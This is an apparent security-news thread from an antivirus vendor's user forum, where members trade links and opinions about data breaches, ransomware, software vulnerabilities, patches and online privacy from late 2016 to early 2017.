http://www.infosecurity-magazine.com/news/august-a-spy-trojan-for-all-seasons/ (http://www.infosecurity-magazine.com/news/august-a-spy-trojan-for-all-seasons/)
84% of Phishing Sites Last for Less Than 24 Hours
http://www.infosecurity-magazine.com/news/84-of-phishing-sites-last-for-less/ (http://www.infosecurity-magazine.com/news/84-of-phishing-sites-last-for-less/)
KFC warns 1.2 million Colonel's Club loyalty scheme members of data breach after website hacked
http://www.mirror.co.uk/news/uk-news/kfc-warns-12-million-colonels-9426835 (http://www.mirror.co.uk/news/uk-news/kfc-warns-12-million-colonels-9426835)
-
Security vulnerabilities fixed in Firefox ESR 45.6
https://www.mozilla.org/en-US/security/advisories/mfsa2016-95/
-
Half of World’s Top Websites are Vulnerable to Attack
http://www.infosecurity-magazine.com/news/half-of-worlds-top-websites-are/ (http://www.infosecurity-magazine.com/news/half-of-worlds-top-websites-are/)
-
Microsoft Security Bulletin Summary for December 2016
https://technet.microsoft.com/library/security/ms16-dec
-
Vital update for Joomla hole: https://developer.joomla.org/security-centre/664-20161201-core-elevated-privileges.html
Update: https://www.joomla.org/announcements/release-news/5693-joomla-3-6-5-released.html
polonus
-
Yahoo discloses hack of 1 billion accounts
https://techcrunch.com/2016/12/14/yahoo-discloses-hack-of-1-billion-accounts/
Affected users will be required to change their passwords, but they do not force people to change it.
-
Yahoo discloses hack of 1 billion accounts
https://techcrunch.com/2016/12/14/yahoo-discloses-hack-of-1-billion-accounts/
Affected users will be required to change their passwords, but they do not force people to change it.
It is amazing that this actually goes back as far as 2013 and is only being reported now. I do recall another article reporting this some time ago and getting advised to change password, etc.
-
Hi Eddy,
Some at Yahoo knew about that 3 years ago.
1. Data-breaches and data-leaks will continue, because software will always have bugs.
2. Normal functioning devices will always get into the hands of people,
that have very little knowledge how to use them properly.
3. Making things upgradable hinders standardisation.
4. IPv4 and IPv6can be spoofed much too eassily.
5. Abuse of infrastructure will continue by guys that abuse for money or for political ends.
6. Experts that can make a difference do not wanna discuss things.
7. Conclusion: This is why we stay where we are, that is at the same ever so high threat level.
Damian
-
The Follow up on Yahoo discloses hack of 1 billion accounts
https://www.bloomberg.com/news/articles/2016-12-15/stolen-yahoo-data-includes-government-employee-information
DavidR,
there was another hack in 2014 where data of +/- 500 million people where stolen and it was disclosed in September this year.
This is a hack that took place in August 2013 and only was discovered last month because the hackers offered the list online.
It sure makes you wonder about the security (department) at Yahoo.
-
It sure makes you wonder about the security (department) at Yahoo.
Shocking, indeed. :o
More here: https://investor.yahoo.net/releasedetail.cfm?ReleaseID=1004285
-
<snip>
DavidR,
there was another hack in 2014 where data of +/- 500 million people where stolen and it was disclosed in September this year.
This is a hack that took place in August 2013 and only was discovered last month because the hackers offered the list online.
It sure makes you wonder about the security (department) at Yahoo.
I have seen that some considerable time ago also.
In all honesty, any company that says it hasn't been hacked is either naive, not telling (scared of the financial consequences) or they haven't been probed yet (small beer).
There is yet another young UK Autistic man fighting extradition to the UK having hacked many different US Government systems, all from his back bedroom. If it is that easy they shouldn't be extraditing people like this by employing them to shore up their lack of security.
-
This massive hack of Yahoo is certainly good news for Verizon.
Wonder if there's any correlation ??? ( No, I'm not really that cynical.... :) )
-
Hi bob3160,
In Europe we had that old saying "the one's death means the other's daily bread".
Sometimes reality in the world is that cynical, it is called "dead" real. ;D
Another subject. How does avast protect it's users against the new Finfisher malware
like malcoded Word, - Adobe Flash Player and - WinRar zero-day attacks from two government hacking groups,
that MS dubbed 'Promethium' & 'Neodymium' .
Users in the Netherlands, Belgium, Turkey and Germany were attacked. But also users in the UK and the U.S.of A.
It seems a cocktail of Wingbird-malware with some commercial spyware/phishware topping.
Good mail protection seems vitally important.
Example of such maware like described here:
https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/
It is not only malware and other abuse you have to evade but now also being hacked by your own
or other friendly or unfriendly governments.
Not good for lawful and abiding citizens, they just feel like the people in the lawless town of the comics,
waiting for Lucky Luke to return.
polonus
-
(http://screencast-o-matic.com/screenshots/u/Lh/1481912769559-16617.png)
Click here for details (http://www.computerworld.com/article/3151012/security/evernote-backs-off-from-privacy-policy-changes-says-it-messed-up.html)
-
Hi bob3160,
Certainly they will back off as it will cost them dearly in customers
whenever they would continue on that road.
When the "cat isup in the curtains" so-to-say, you'd better have an improved secondary plan.
But I think all of these services are similar - OneNote, Evernote, Google's etc.
Do not share with them in the cloud, what you'd not like to share with others anyway.
It is your own repeated warning, bob3160 and it is a hard truth and 100%.
But the worst things that it did not teach IT staff around the world
not to save their account and password information in the Evernote-cloud.
With all the hacking and security and data-breaches going around,
you soon could be an innocent victim and when your info is on the loose
you'd never know where it lands in the the wide, wild, web world
and it may never come around forever and a day..... ;D
your avast forum-friend,
Damian
-
Chrome’s Adblock Pro is a uBlock Origin rip-off
http://www.ghacks.net/2016/12/18/chromes-adblock-pro-is-a-ublock-origin-rip-off/
-
Chrome’s Adblock Pro is a uBlock Origin rip-off
http://www.ghacks.net/2016/12/18/chromes-adblock-pro-is-a-ublock-origin-rip-off/ (http://www.ghacks.net/2016/12/18/chromes-adblock-pro-is-a-ublock-origin-rip-off/)
sounds like another iobit malwarebytes fiasco
-
Hi bob3160,
If true, this is another example of where user's trust comes flying out of the window with a form of blatant code theft.
Just like the secret scandal with selling the WoT tool user base data. Swindlers everywhere and no one who calls it to a halt.
We are in need of another continent like Australia once, where we can send all these fraudsters and swindlers.
Making money from other person's brains and code. It is a shame really. They aren't ashamed of anything anymore,
online Sodom and Gomorra of abuse.
polonus
P.S. Also important scroll down to mem consumption differences between ABP & uBlock origin:
https://github.com/gorhill/uBlock#memory
-
Yahoo is not safe to use,’ former company engineer says
https://www.the-parallax.com/2016/12/16/yahoo-not-safe-former-engineer-says/
How to dump your Yahoo, Flickr, and Tumblr accounts
https://www.the-parallax.com/2016/10/12/dump-yahoo-flickr-tumblr-accounts/
-
Amsterdam Data Centre into very big ad-fraud: http://www.whiteops.com/methbot
polonus
-
Looks like PC Matic and Malwarebytes are looked in a battle.
Malwarebytes is tagging PC Matic as a PUP and PC Matic is retaliating by blocking Malwarebytes.
Apparently Malwarebytes is refusing to talk to PC Matic and vicar versa.
To me, it looks like mutual exclusions should work. Since I don't use PC Matic, I can't guarantee that however.
http://greenarrow.pcpitstopmail.com/ss/link.php?N=21315&L=3824&S=QjZjNTM&E=cXZ4xWZyBUYylWZz1WYyRnLj9Wb&H=LgDNbrd3
https://forums.pcpitstop.com/index.php?/topic/206255-pc-matic-and-malwarebytes-pup-flags/?view=findpost&p=1808872&hl=pcmatic
-
Facebook flaw mitigated: http://www.dawgyg.com/2016/12/21/disclosing-the-primary-email-address-for-each-facebook-user/
polonus
-
Looks like PC Matic and Malwarebytes are looked in a battle.
Malwarebytes is tagging PC Matic as a PUP and PC Matic is retaliating by blocking Malwarebytes.
Apparently Malwarebytes is refusing to talk to PC Matic and vicar versa.
To me, it looks like mutual exclusions should work. Since I don't use PC Matic, I can't guarantee that however.
http://greenarrow.pcpitstopmail.com/ss/link.php?N=21315&L=3824&S=QjZjNTM&E=cXZ4xWZyBUYylWZz1WYyRnLj9Wb&H=LgDNbrd3
https://forums.pcpitstop.com/index.php?/topic/206255-pc-matic-and-malwarebytes-pup-flags/?view=findpost&p=1808872&hl=pcmatic
That's actually quite a non-professional way of dealing with the issue from MBAM since they didn't respond to pcpitstop when asked.I really like their products.But locking horns seems just a distraction from the real fight against malware and ransomware.They are even blocking austologics cleaner.
Update: atleast they explained it:
https://blog.malwarebytes.com/puppum/2016/12/why-malwarebytes-detects-pc-pitstop-as-potentially-unwanted/
-
VMware Security Advisories - VMSA-2016-0024
https://www.vmware.com/security/advisories/VMSA-2016-0024.html
-
A Malware Cocktail Shakes Up Cerber Ransomware Infections
http://www.infosecurity-magazine.com/news/a-malware-cocktail-shakes-up/ (http://www.infosecurity-magazine.com/news/a-malware-cocktail-shakes-up/)
-
Alice: A Lightweight, Compact, No-Nonsense ATM Malware
http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/
-
Alice: A Lightweight, Compact, No-Nonsense ATM Malware
http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/ (http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/)
Now here I thought you were talking about my wife Alice and all the ATM withdrawals she's been making lately ???
-
hmmm, maybe this need further investigation ;D
-
Service worker javascript code changes bringing more extensive Google snoopin'to your chrome/newtab?
Read on these recent changes: https://www.reddit.com/r/javascript/comments/3n4cyz/suspicious_service_worker_in_chrome/
Why would they do that?
Maybe we have to consider this also in the light of having to hand over your Google account credentials before entering the USA,
this is the public side of it now: http://www.politico.com/story/2016/12/foreign-travelers-social-media-232930
Soon they also will perform such checks at this side of the Atlantic too, for instance at Amsterdam Schiphol airport in the Netherlands, will be handled by American officials.
Being on social media is not that innocent, folks.
Mind the spooks....
polonus
-
New DeriaLock Ransomware Active on Christmas, Includes An 'Unlock All' Command
https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/ (https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/)
Hope avast is ready...... ;)
-
Protection against malicious Word-macro's using Windows Firewall:
https://limpidwebblog.blogspot.com/2016/10/a-shower-leads-to-powershell-puking.html
PowerShell will come to Windows 10 shortly for the command prompt interpreter.
A bash-shell in beta has also arrivedl:
http://www.howtogeek.com/249966/how-to-install-and-use-the-linux-bash-shell-on-windows-10/
Having been around for years and offering far more is cygwin, with editors, compilers, database clients, etc. You could even choose to install the X server to get an X Windows graphical user interface. In this way you can run graphical Linux: programs:https://www.cygwin.com
All for the anvanced user, but others may try as well.
polonus
-
Millions of Websites Vulnerable Due to Security Bug in Popular PHP Script
https://www.bleepingcomputer.com/news/security/millions-of-websites-vulnerable-due-to-security-bug-in-popular-php-script/
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
-
Hi Pondus beaten me to it by a sec ;)
N.B. Big zero-day hole in WordPress PHP Mailer: https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
Critical Vulnerability in PHPMailer. Affects WP Core [1]
Millions and millions of websites vulnerable.
A critical remote code execution vulnerability in PHPMailer has been discovered by Polish researcher Dawid Golunski. The vulnerability was announced on legalhackers.com yesterday but proof of concept exploit details were not included.
Unfortunately someone posted a proof of concept to exploit-db and to github a few hours ago demonstrating how the vulnerability can be exploited in the PHPMailer library, but not targeting any web application that is in use.
We are publishing this unscheduled update to give PHP developers and our community advance warning of this issue. We expect this story to continue to evolve rapidly as more developers and malicious actors look at this code.
An issue in WP core was opened about 4 hours ago that included a patch to fix this issue. It updates WP core from using PHPMailer 5.2.14 to 5.2.19. This is just a proposed patch, not the final fix.
polonus
-
Evolved DNSChanger malware slings evil ads at PCs, hijacks routers
Software nasty is packed with exploits for vulnerabilities in home broadband boxes
http://www.theregister.co.uk/2016/12/20/new_dnschanger_exploit_kit_goes_after_166_types_of_router/
-
Update...
Since an hour there is a patched update for WP core: https://github.com/PHPMailer/PHPMailer/blob/master/class.phpmailer.php
All are asked to update to version 5.2.19.
polonus
-
KillDisk ransomware demands over $215,000
https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/ (https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/)
-
This man's smart television with Google TV caught some malware, and now it's bricked
http://www.androidpolice.com/2016/12/27/smart-mans-smart-television-google-tv-caught-malware-now-bricked/
-
This man's smart television with Google TV caught some malware, and now it's bricked
http://www.androidpolice.com/2016/12/27/smart-mans-smart-television-google-tv-caught-malware-now-bricked/
What I have been banging on about Smart TV for some time, pigeons coming home to roost.
I'm waiting for the IoT (Internet of Things) coming down with the same hijack/malware issues. Imagine your fridge locking you out or ordering stuff for itself, fridge light, heater and TV.
-
This man's smart television with Google TV caught some malware, and now it's bricked
http://www.androidpolice.com/2016/12/27/smart-mans-smart-television-google-tv-caught-malware-now-bricked/ (http://www.androidpolice.com/2016/12/27/smart-mans-smart-television-google-tv-caught-malware-now-bricked/)
It has already been un-bricked. :)
(Read the relies.)
-
You would think he would have tried a factory restore as a first step anyway as that would have been a detailed step in the troubleshooting guide at the back of the TV's user manual, the TV would have been fixed in 5 minutes :)
-
FTC Seeks Tools for Securing Home IoT Devices
http://www.securityweek.com/ftc-seeks-tools-securing-home-iot-devices
Submissions will be evaluated by a panel of five judges.
The top prize is $25,000, but the FTC is also prepared to reward three other competitors with up to $3,000.
-
Quarter of Dutch hospitals does not secure their websites sufficiently enough according to Dutch WICS, women in cybersecurity. 25 hospitals did not even use secure connections, others were vulnerable to potential patient data breaches etc.
Dutch news link: http://www.trouw.nl/tr/nl/39683/nbsp/article/detail/4444509/2017/01/06/Ziekenhuizen-beveiligen-sites-niet-goed.dhtml (use google translate)
If management income has a first priority and security comes as a last resort issue, we could get into a situation we have at hand now
polonus
-
Koolova ransomware decrypts your files for free if you read two security articles
https://www.neowin.net/news/koolova-ransomware-decrypts-your-files-for-free-if-you-read-two-security-articles
http://thehackernews.com/2017/01/decrypt-ransomware-files.html
-
Interesting virtual attack map for ye all: http://map.norsecorp.com/#/
pol
-
Unsecure routers, webcams prompt feds to sue D-Link
http://arstechnica.com/tech-policy/2017/01/unsecure-routers-webcams-prompt-feds-to-sue-d-link/?comments=1
-
Interesting virtual attack map for ye all: http://map.norsecorp.com/#/
pol
http://map.ipviking.com/ >> seems to be down or maintenance
http://cybermap.kaspersky.com/
http://worldmap3.f-secure.com/
http://threatmap.fortiguard.com/
https://blog.opendns.com/global-network/
http://dds.ec/pewpew/index.html
https://www.fireeye.com/cyber-map/threat-map.html
http://www.digitalattackmap.com/
https://threatmap.checkpoint.com/ThreatPortal/livemap.html
http://www.trendmicro.com/us/security-intelligence/current-threat-activity/global-botnet-map/index.html
-
Norton Core router >> https://norton.com/core
https://www.cnet.com/products/norton-core/preview/
http://www.trustedreviews.com/news/norton-core-secure-router-for-smart-home-devices
There is already similar products from Bitdefender / F-Secure / ASUS-TrendMicro
Should avast do the same?
-
Top Ten Hosting/ISP's infested with Brobot: https://www.dosarrest.com/ddos-blog/top-ten-hosting-isp-s-with-servers-infected-by-brobot/
And a scan for a site not responsive: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.urlencoded.com%2Ftrack.php
error found JavaScript
error: line:3: SyntaxError: missing = in XML attribute:
error: line:3: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01/EN" "http:/www.w3.org/TR/html4/strict.dtd">
error: line:3: ...............^
related to offline transactions....
polonus
-
New Scheme: Spread Popcorn Time Ransomware, get chance of free Decryption Key
https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/
With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key.
-
Spoofed Microsoft Security Office – Urgent Info Regarding Your Bank Assets delivers unknown malware
https://myonlinesecurity.co.uk/spoofed-microsoft-security-office-urgent-info-regarding-your-bank-assets-delivers-unknown-malware/
-
From Darknet with Love: Meet Spora Ransomware
http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/ (http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/)
Hope avast+AVG are protected from Spora and other ransomware families. :D
-
From Darknet with Love: Meet Spora Ransomware
http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/ (http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/)
Hope avast+AVG are protected from Spora and other ransomware families. :D
Spora Ransomware Works Offline, Has the Most Sophisticated Payment Site as of Yet
https://www.bleepingcomputer.com/news/security/spora-ransomware-works-offline-has-the-most-sophisticated-payment-site-as-of-yet/
https://virustotal.com/nb/file/1250f821898d7cfe9ef323801b283529668c59c064408920002710a4ce042356/analysis/
https://virustotal.com/nb/file/dbfd24cd70f02ddea6de0a851c1ef0f45f18b4f70e6f3d0f2e2aec0d1b4a2cbf/analysis/
-
Microsoft Security Bulletin Summary for January 2017
https://technet.microsoft.com/library/security/ms17-jan.aspx
-
Marlboro new Ransomware!Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA (https://youtu.be/Qg-2h8szsGA)
-
Marlboro new Ransomware!Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA (https://youtu.be/Qg-2h8szsGA)
It's a pity that we don't have more info about the infector (MD5, etc.).
There is not an explicit VirusTotal link either.
-
Marlboro new Ransomware!Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA (https://youtu.be/Qg-2h8szsGA)
It's a pity that we don't have more info about the infector (MD5, etc.).
There is not an explicit VirusTotal link either.
https://www.virustotal.com/en/file/a95d7606d17b221bca0960d04bffdc5ff1585ca13a2511bbf5347a732a3a025c/analysis/ (https://www.virustotal.com/en/file/a95d7606d17b221bca0960d04bffdc5ff1585ca13a2511bbf5347a732a3a025c/analysis/)
WE ARE PROTECTED!!!
-
Wow! Thanks Be Secure 8)
-
Marlboro new Ransomware!Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA (https://youtu.be/Qg-2h8szsGA)
It's a pity that we don't have more info about the infector (MD5, etc.).
There is not an explicit VirusTotal link either.
There is something called google search ;) then you find articles and stuff with MD5
Like this and many more
https://www.bleepingcomputer.com/news/security/marlboro-ransomware-defeated-in-one-day/
-
Confirmed: WhatsApp backdoored for snoopers: https://www.theguardian.com/technology/2017/jan/13/whatsapp-backdoor-allows-snooping-on-encrypted-messages
With cross-device tracking and tracking via keystroke-dynamics you'd better put some duct-tape over that device camera.
I want an opt-out for this and not constantly being requested to opt-in to be part of this global surveillance party.
I wanna decide when to close the curtains or turn down the lights, you social media snoopers, even when I have nothing to hide.
polonus
P.S. Good I have my apps locking from Avast Mobile Security.
-
Genealogy Caution:
(http://screencast-o-matic.com/screenshots/u/Lh/1484401895905-19238.png)
https://www.washingtonpost.com/news/the-intersect/wp/2017/01/12/youve-probably-never-heard-of-this-creepy-genealogy-site-but-its-heard-all-about-you/
-
You might reconsider buying that 6th or 7th generation “U” processor computer.
http://www.digitaltrends.com/computing/intel-kaby-lake-skylake-pcs-hackable-usb-jtag/
-
You might reconsider buying that 6th or 7th generation “U” processor computer.
http://www.digitaltrends.com/computing/intel-kaby-lake-skylake-pcs-hackable-usb-jtag/
I think its a bit late considering 6th generation "U" processors have been out for a very long time. The 7th generation "U" processors have been out for a short time, I have actually got one.
From my reading of this article, don't they have to have physical access to your system to plug into the USB 3 port. If so that is the least of your problems as they can do anything, essentially they own the system.
-
...If so that is the least of your problems as they can do anything, essentially they own the system.
There seems to be a contradiction in the quoted sentence. Did you mean to say it's the least of your problems since they can only do harm if they have physical access to your computer which they presumably won't have?
-
...If so that is the least of your problems as they can do anything, essentially they own the system.
There seems to be a contradiction in the quoted sentence. Did you mean to say it's the least of your problems since they can only do harm if they have physical access to your computer which they presumably won't have?
You quote a sentence in isolation, which is part of that paragraph and takes it out of context.
From my reading of this article, don't they have to have physical access to your system to plug into the USB 3 port. If so that is the least of your problems as they can do anything, essentially they own the system.
-
You quote a sentence in isolation, which is part of that paragraph and takes it out of context.
As part of the whole context it's also a contradiction.
What is the least of your problems? The fact that they can do anything, or the fact that they need physical access (in which case they do nothing)?
-
Please help me!! I ask for your help! Avast Free some background service periodically turned off !!! It has had a warning window: avast a service program to switch off! But the program did not identify. What could be the problem, because today about 10-15 minutes Peda something in the background, turn off the background and service: You are defenseless! I get a message down to three service reset. self-defense module does not work ??? ??? ??? :( >:(
-
Please help me!! I ask for your help! Avast Free some background service periodically turned off !!! It has had a warning window: avast a service program to switch off! But the program did not identify. What could be the problem, because today about 10-15 minutes Peda something in the background, turn off the background and service: You are defenseless! I get a message down to three service reset. self-defense module does not work ??? ??? ??? :( >:(
Repair Avast:
Control Panel> Program and Features (Add/remove program)>Select Avast> Select Repair. Reboot when completed
https://www.avast.com/faq.php?article=AVKB204
If Repair doesn't fix the problem, try the following:
Clean Install of Avast:
https://goo.gl/4Ptzkf
If this doesn't solve your problem, please start your own topic.
-
You quote a sentence in isolation, which is part of that paragraph and takes it out of context.
As part of the whole context it's also a contradiction.
What is the least of your problems? The fact that they can do anything, or the fact that they need physical access (in which case they do nothing)?
It is clearly obvious, if they have access to your system your stuffed, so that exploit is secondary to the damage/theft, etc. etc. they can do what they like. As I said "essentially they own the system."
-
It is clearly obvious, if they have access to your system your stuffed, so that exploit is secondary to the damage/theft, etc. etc. they can do what they like. As I said "essentially they own the system."
Some readers didn't find the way you originally wrote it so obvious.
Anyway, the bottom line is that if baddies gain access to someone's computer they can do anything with it, so this is a secondary concern. This has also been confirmed by Intel:
http://www.digitaltrends.com/computing/intel-kaby-lake-skylake-pcs-hackable-usb-jtag/
-
Make sure your browser isn't filling in hidden auto-fill fields:
http://www.digitaltrends.com/computing/browser-bug-can-fill-in-personal-information-in-hidden-fields/
http://www.zdnet.com/article/new-phishing-attack-steals-personal-data-through-browser-autofill/
-
Locky Ransomware Activity Goes Down by 81%
https://www.bleepingcomputer.com/news/security/locky-ransomware-activity-goes-down-by-81-percent/ (https://www.bleepingcomputer.com/news/security/locky-ransomware-activity-goes-down-by-81-percent/)
-
Wide Impact: Highly Effective Gmail Phishing Technique Being Exploited
https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/
-
What the Most Common Passwords of 2016 List Reveals
https://blog.keepersecurity.com/2017/01/13/most-common-passwords-of-2016-research-study/
And the winner is 123456 ::)
wonder how many avast accounts that use it?
-
What the Most Common Passwords of 2016 List Reveals
https://blog.keepersecurity.com/2017/01/13/most-common-passwords-of-2016-research-study/
And the winner is 123456 ::)
wonder how many avast accounts that use it?
God that is an easy one, should have used 12345678, much harder to crack :D
-
Unbreakable Locky ransomware is on the march again
http://www.theregister.co.uk/2017/01/20/locky_ransomware_horrorshow_returns/ (http://www.theregister.co.uk/2017/01/20/locky_ransomware_horrorshow_returns/)
-
HP recalls lots of laptop batteries due to the hazard they pose.
Be sure to check your batteries if your laptop is from HP.
http://www.makeuseof.com/tag/hp-recalls-laptop-batteries-check-now/
http://www.digitaltrends.com/computing/hp-battery-recall-expansion/
-
[ALERT] USB Sticks Could Infect Your Network With New Spora Ransomware Worm
https://community.spiceworks.com/topic/1958926-alert-usb-sticks-could-infect-your-network-with-new-spora-ransomware-worm (https://community.spiceworks.com/topic/1958926-alert-usb-sticks-could-infect-your-network-with-new-spora-ransomware-worm)
-
Former Mozilla Engineer: Your Antivirus Is Poison, Remove It Now
http://news.softpedia.com/news/former-mozilla-engineer-your-antivirus-is-poison-remove-it-now-512300.shtml
I totally disagree.
-
Former Mozilla Engineer: Your Antivirus Is Poison, Remove It Now
http://news.softpedia.com/news/former-mozilla-engineer-your-antivirus-is-poison-remove-it-now-512300.shtml
I totally disagree.
Well this shows his level of knowledge of other AVs or the various AV tests.
He says Windows Defender is a “competent” piece of software,
Why then did avast at some point recommend installing a 3rd party AV.
-
Maybe that's why he's a former employee???
-
Maybe that's why he's a former employee???
;D 8)
-
@Asyn and @bob3160,
Maybe he is one of those former employee with 'modern' insights,
that strongly advice against the use of any anti-virus?
Yes, such folks actually exist.
A bunch of guys now want one software to do it all while just clicking on - clickerdyclick.... :D
and then they are into more sorts of realms of wishful thinking.
Let them dream on and let us stay realistic.
polonus
-
@Asyn and @bob3160,
Maybe he is one of those former employee with 'modern' insights,
that strongly advice against the use of any anti-virus?
Yes, such folks actually exist.
A bunch of guys now want one software to do it all while just clicking on - clickerdyclick.... :D
and then they are into more sorts of realms of wishful thinking.
Let them dream on and let us stay realistic.
polonus
The problem is that these kind of misguided souls ways pick up a following.
This is another one of those stupid questions I often have to answer.
-
Flaws in NAS Firmware Expose Users to ‘Massive Compromise'
https://www.f-secure.com/en/web/press_global/news-clippings/-/journal_content/56/1075444/1846920?p_p_auth=n5Aruqhu
-
Data is the ‘New Oil' and Everyone Needs to know what they're Leaking
https://www.f-secure.com/en/web/press_global/news-clippings/-/journal_content/56/1075444/1863508?p_p_auth=n5Aruqhu
-
Content Injection Vulnerability in WordPress
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
-
https://blog.avast.com/avast-releases-three-more-decryption-tools-for-ransomware-victims (https://blog.avast.com/avast-releases-three-more-decryption-tools-for-ransomware-victims)
Appears melding of avast and avg together is now coming to fruition as we are now seeing anti-malware tools avast has not had before?
-
https://blog.avast.com/avast-releases-three-more-decryption-tools-for-ransomware-victims (https://blog.avast.com/avast-releases-three-more-decryption-tools-for-ransomware-victims)
Appears melding of avast and avg together is now coming to fruition as we are now seeing anti-malware tools avast has not had before?
They were already on those decryption tools before the merge. To the same end they were trying to improve the ransomeware detections But anything is welcome.
-
Microsoft Windows SMB Tree Connect Response memory corruption vulnerability
http://www.kb.cert.org/vuls/id/867968
-
Locky Ransomware, Kovter Click-Fraud Malware Spreading in Same Campaigns
https://threatpost.com/locky-ransomware-kovter-click-fraud-malware-spreading-in-same-campaigns/123560/ (https://threatpost.com/locky-ransomware-kovter-click-fraud-malware-spreading-in-same-campaigns/123560/)
-
Questioning the validity of AV-test results: http://robert.ocallahan.org/2017/01/a-followup-about-av-test-reports.html
polonus
-
Questioning the validity of AV-test results: http://robert.ocallahan.org/2017/01/a-followup-about-av-test-reports.html (http://robert.ocallahan.org/2017/01/a-followup-about-av-test-reports.html)
polonus
Articles like that are a way to instantly gain attention and "fame". :)
-
@bob3160,
We two know better, don't we?
Obvious from what Robert O'Callahan states, is that he does not know how AV-Comparatives is testing.
Consider the small detection window and time-frame (under 20 minutes) often provided for them for the various lauch-points of malware, that makes his story sound not completely based on live theater experience. Besides AV-Comparatives is a fully independant institute and authortities make sure their research cannot be influenced by third party interests either benign nor criminal (TÜV oversight).
In an ever changing malware landscape, that is what you get. I.m.o. this blogger does not know what he is on about.
According to me he never was related to the security industry etc. His 5 minutes of fame against those that are in the know.
Damian
-
Russian spy purge after suspected leaks to U.S. intelligence
http://money.cnn.com/2017/02/01/news/fsb-kaspersky-arrests/index.html
=============================================================
Russian security teams also arrested an employee of Russian internet security firm Kaspersky Lab. Ruslan Stoyanov was the head of the company's computer incidents investigation team, where he oversaw hacking investigations.
In a statement, Kaspersky said he was under investigation "for a period predating his employment at Kaspersky Lab." He had joined the company in July 2012, according to his LinkedIn profile. Kaspersky also insisted it has "no political ties to any government."
==============================================================
Hmmmm ..... not sure i trust Kaspersky
-
Now that both Net Neutrality and Privacy are dead in the water, read this interesting link how the profiling of Internet users could be used in data-driven communication. There is a lot of subtle psychology involved and it can be set to work via the hidden hand of our social media data manipulation, like facebook, whatsapp and the like.
Read: https://motherboard.vice.com/en_us/article/how-our-likes-helped-trump-win
polonus
-
Now that both Net Neutrality and Privacy are dead in the water, read this interesting link how the profiling of Internet users could be used in data-driven communication. There is a lot of subtle psychology involved and it can be set to work via the hidden hand of our social media data manipulation, like facebook, whatsapp and the like.
Read: https://motherboard.vice.com/en_us/article/how-our-likes-helped-trump-win (https://motherboard.vice.com/en_us/article/how-our-likes-helped-trump-win)
polonus
Privacy has been dead for a very long time. You were just pretending to hide.....
-
Hi bob3160,
Yes and Google can be ordered to turn all of your data over to the FBI or other three-letter services for that matter, read here: http://www.reuters.com/article/us-google-usa-warrant-idUSKBN15J0ON and what of the iCloud when those experts that should protect your data or back-up versions aren't those super experts they always pretend to be and carriers and cloud-services only take responsibility for carrying and transporting and not against a hack or a data-breach of your data in the Cloud?
As you always say. Do not share with Interwebs what you do not like to share with everyone.
Privacy and integrety is a non-existent animal....
You are rather naive when you think your pizzaweb google forms are still yours only....
but the simpletons among us do not care until it is too late.
polonus
-
It's time to realize, it's already too late. :(
-
Polish banking industry takes a serious malware hit by javascript injection from the Polish Banking Regulator (KNF),
see: https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
the present situation is being monitored: https://www.youtube.com/watch?v=0OrmAhpBhoY (po polsku)
For our Polish users that have bank accounts there 'w kraju'.
Warto na temat spojrzeć szerzej i dostrzec pewien schemat:
https://zaufanatrzeciastrona.pl/post/czeski-msz-porzadnie-zhakowany-polski-msz-sobie-z-atakiem-rosjan-poradzil/
and
http://www.pandasecurity.com/mediacenter/pandalabs/dangerous-malware-neutralized/
polonus (volunteer website security analyst and website error-hunter)
-
On the risks from the insider intrusion from within the organization: https://intsights.com/the-dark-webs-increasing-influence-on-insider-risk/
info credits go to: Ido Wulkan, IntSights Head of Intelligence, Herzliya, Il.
pol
-
Will Word Press CMS ever be secure? I only would like to use it for simple websites with just plain txt.
Being based on PHP (with a very questionable security status) the CMS is highly insecure.
Re: https://blog.sucuri.net/2017/02/wordpress-rest-api-vulnerability-abused-in-defacement-campaigns.html
Also interesting to read: http://unserkaiser.com/blog/2014/02/21/wordpress-password-protected-posts-feature-or-security-leak/
polonus
-
Beware of Cancer trollware, might shut down your favorite AV, too.
https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/ (https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/)
-
Google, Mozilla and Cloudflare complain about AV https interception: https://zakird.com/papers/https_interception.pdf
polonus
-
From those that report:
"We tested and found that the following products did not intercept TLS
connections: 360 Total, Ahnlabs V3 Internet Security, Avira AV 2016, Comodo
Internet Security, F-Secure Safe, K7 Total Security, Malwarebytes, McAfee
Internet Security, Microsoft Windows Defender, Norton Security, Panda Internet
